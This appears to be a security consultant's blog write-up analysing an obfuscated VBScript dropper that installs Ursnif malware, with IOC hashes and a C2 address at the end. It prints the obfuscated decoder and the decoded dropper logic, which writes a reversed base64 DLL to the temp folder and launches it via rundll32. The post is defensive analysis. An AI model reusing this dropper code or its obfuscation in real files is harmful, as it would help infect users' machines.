(ΛpiΛtΙ(r)), n, Dutch Computer geek, Father of 3 boys, Living together with @Chrizzzz. Working as a security consultant at @Atos, CISSP certified, Opinions are my own.
Short VisualBasic #Ursnif dropper write-up
3 min read
Here is my first post of a short investigation into a malicious script that I came across.
The sample was posted to theΒ URLhaus.abuse.ch list. This is probably part of a phising mail which directs you to download the zip file and open it.
When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.
After unzipping we can have a first look at the .vbs script
The malicious script:
- A large string ending in "AAAAMAAQqVT" I'm already assuming a reversed PE executable, when you base64 encode the MZ header it results in something like TVxx.
- Two arrays
- A short code block to decode the array's in something useful
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)
A little rewriting and making it saver by echo the output instead of execute it, results in the following VBS code :
for Value = lbound(ArrayOne) to ubound(ArrayTwo)
Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
ConcatResult = ConcatResult & Result
next
WScript.Echo ConcatResultRunning this result in the following script.
on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = "http://adobe.com"
oUrlLink.Save(A)
if (FSO.FileExists(Path)) Then
WScript.Echo "Error!"
else
xml = "Msxml2.DOMDocument"
ws = "WScript.Shell"
bin = "bin.base64"
sa = "shell.application"
bs = "base64"
db = "Adodb.Stream"
Set wshs = createobject(ws)
Set sh = createobject(sa)
filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if
Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)
Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0The script places a Adobe.url in the temp folder pointing toΒ http://
and it like I already suspected does a string reverse on the code variable - strreverse(code)
passing this via the base64 decoder resullts in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll
The dropped file SHCSdw.dll is a Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available in Virustotal.
IOC's
| File | Type | sha256 |
|---|---|---|
| dokument9055.zip | Zip archive data | bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c |
| dokument9055.vbs | VisualBasic script | 98b3160c553c229cb9be77de3791398aed3cce79e7935d96db9e32bf353b9624 |
| SHCSdw.dll | PE32 executable (DLL) | bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32 |
!["Intel Gaphics Adopter", Nah, this sofware is 100% legit no worries. #CRIMSON C2:185[.]244.30[.]102:4590](https://srcr.nl/file/54f2947da99f0d92cd21fd15a9ee78b4/Annotation+2020-02-25+135215.png)
![An #opendir at hxxp://gazpromstaff[.]com, 8 .exe found in subdirs. Domain suggest watering hole attack](https://srcr.nl/file/119f46ce341f329481c17b62487ec901/Annotation+2020-02-24+142332.png)
